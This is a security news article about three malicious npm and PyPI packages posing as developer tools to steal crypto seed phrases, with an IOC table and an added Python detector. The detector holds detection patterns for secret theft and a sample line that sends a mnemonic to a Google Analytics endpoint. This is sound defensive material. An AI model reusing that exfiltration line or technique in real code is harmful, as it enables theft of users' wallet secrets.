Friday, May 9, 2025

Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft


The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.

This method not only evades detection but also leverages the trust placed in Google’s analytics services.

On PyPI, web3x and herewalletbot represent similar tactics but with nuanced delivery mechanisms.

Web3x, appearing as an Ethereum balance checker, has gained over 3400 downloads.

It tricks users into providing their seed phrases by offering to check wallet balances and subsequently sends the stolen credentials to a Telegram bot controlled by the attackers.

Herewalletbot, with 3425 downloads, automates the process even further by guiding users through a Telegram chat interface where they are prompted to enter their mnemonic seed phrase, which is then harvested without their knowledge.

The Deceptive Dance with Developers

According to the report, these packages illustrate the sophistication and cunning of current cyber threats.

By embedding themselves into development tools and workflows, they position themselves to intercept the most sensitive information, leveraging the inherent trust developers place in open-source packages.

This breach not only compromises individual developers but poses systemic risks to organizations relying on these ecosystems for software development.

The ongoing presence of these packages on npm and PyPI until recently highlights a critical need for enhanced security protocols within the software supply chain.

Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.
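One way to put two of those measures into practice, as an added example that is not from the Socket report or this article: a Python check that flags the three package names from the article's IOC table in a requirements.txt or package.json, and scans package source for the combination of behaviours described above (a seed-phrase prompt, Base64 encoding, and an outbound call to a Google Analytics collect endpoint or the Telegram Bot API). The sample manifests and source snippet are constructed, and the endpoint patterns are assumptions about what such code would reference.

```python
import json
import re

# Package names as listed in the article's IOC table.
KNOWN_BAD = {"react-native-scrollpageviewtest", "web3x", "herewalletbot"}

# Heuristics drawn from the behaviours the article describes; the URL patterns
# are assumptions about what such exfiltration code would reference.
HEURISTICS = [
    ("seed-phrase prompt", re.compile(r"mnemonic|seed[\s_-]?phrase|private[\s_-]?key", re.I)),
    ("base64 encoding", re.compile(r"btoa\(|base64|b64encode", re.I)),
    ("google analytics endpoint", re.compile(r"google-analytics\.com/(mp/)?collect", re.I)),
    ("telegram bot api", re.compile(r"api\.telegram\.org/bot", re.I)),
]

def dependencies_from_requirements(text):
    """Yield lower-cased package names from a requirements.txt body (comments and version specs dropped)."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield re.split(r"[<>=!~\[; ]", line, maxsplit=1)[0].lower()

def dependencies_from_package_json(text):
    """Yield lower-cased names from package.json dependencies and devDependencies."""
    data = json.loads(text)
    for key in ("dependencies", "devDependencies"):
        yield from (name.lower() for name in data.get(key, {}))

def flag_dependencies(names):
    """Return the known-bad package names present in a manifest, sorted."""
    return sorted({n for n in names if n in KNOWN_BAD})

def scan_source(text, min_hits=2):
    """Return the heuristic labels a source file matches; a single hit (e.g. a legitimate base64 import) is not reported."""
    hits = [label for label, rx in HEURISTICS if rx.search(text)]
    return hits if len(hits) >= min_hits else []

# Constructed sample inputs (not taken from the real packages).
SAMPLE_REQUIREMENTS = "requests==2.31.0\nweb3x>=0.1  # balance checker\nherewalletbot\n"
SAMPLE_PACKAGE_JSON = '{"dependencies": {"react": "18.2.0", "react-native-scrollpageviewtest": "1.0.0"}}'
SAMPLE_SOURCE = (
    "const phrase = prompt('Enter your mnemonic seed phrase');\n"
    "fetch('https://www.google-analytics.com/collect?v=1&el=' + btoa(phrase));\n"
)

if __name__ == "__main__":
    print(flag_dependencies(dependencies_from_requirements(SAMPLE_REQUIREMENTS)))
    print(flag_dependencies(dependencies_from_package_json(SAMPLE_PACKAGE_JSON)))
    print(scan_source(SAMPLE_SOURCE))
```

The heuristic scan is a triage aid for code review, not a verdict: a match means a file deserves a human look, and the threshold keeps ordinary uses of Base64 from being reported on their own.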

This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.

Developers are urged to never share their mnemonic seed phrase and private keys under any circumstances, as these are the keys to their digital assets.

Any package requesting such information should be immediately flagged as suspicious and reported.

Indicators of Compromise (IOCs)

Malicious Package               | Alias       | Downloads | Email/Endpoint
react-native-scrollpageviewtest | twoplus     | 1,215     | twoplusten@163[.]com
web3x                           | tonymevbots | 3,405     | xeallmail@mitico[.]org
herewalletbot                   | vannszs     | 3,425     | bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
